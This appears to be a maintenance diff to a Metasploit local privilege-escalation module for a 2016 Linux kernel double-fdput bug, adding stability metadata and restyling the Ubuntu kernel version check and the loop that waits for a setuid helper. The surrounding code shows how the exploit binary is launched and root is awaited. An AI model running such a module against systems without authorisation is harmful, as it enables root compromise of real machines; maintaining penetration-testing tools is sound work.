@@ -40,7 +40,6 @@ class MetasploitModule < Msf::Exploit::Local
           'h00die <mike@shorebreaksecurity.com>' # metasploit module
         ],
         'Platform' => ['linux'],
-        'Arch' => [ARCH_X86, ARCH_X64],
         'SessionTypes' => ['shell', 'meterpreter'],
         'DisclosureDate' => '2016-05-04',
         'Privileged' => true,
@@ -69,7 +68,10 @@ class MetasploitModule < Msf::Exploit::Local
                    [
                      'double-fdput',
                      'doubleput.c'
-                   ]
+                   ],
+          'Stability' => UNKNOWN_STABILITY,
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
         },
         'DefaultTarget' => 1,
         'Compat' => {
@@ -190,11 +192,9 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe
     end
 
-    if version.downcase.include?('ubuntu') && release =~ /^4\.4\.0-(\d+)-/
-      if $1.to_i > 21
-        vprint_error "Kernel version #{release} is not vulnerable"
-        return CheckCode::Safe
-      end
+    if version.downcase.include?('ubuntu') && release =~ /^4\.4\.0-(\d+)-/ && (::Regexp.last_match(1).to_i > 21)
+      vprint_error "Kernel version #{release} is not vulnerable"
+      return CheckCode::Safe
     end
     vprint_good "Kernel version #{release} #{version} appears to be vulnerable"
 
@@ -527,7 +527,7 @@ class MetasploitModule < Msf::Exploit::Local
     register_dir_for_cleanup "#{base_dir}/fuse_mount"
     cmd_exec "cd #{base_dir}; #{doubleput_path} & echo "
     sec_waited = 0
-    until sec_waited > datastore['MAXWAIT'] do
+    until sec_waited > datastore['MAXWAIT']
       Rex.sleep(5)
       # check file permissions
       if setuid? @suidhelper_path
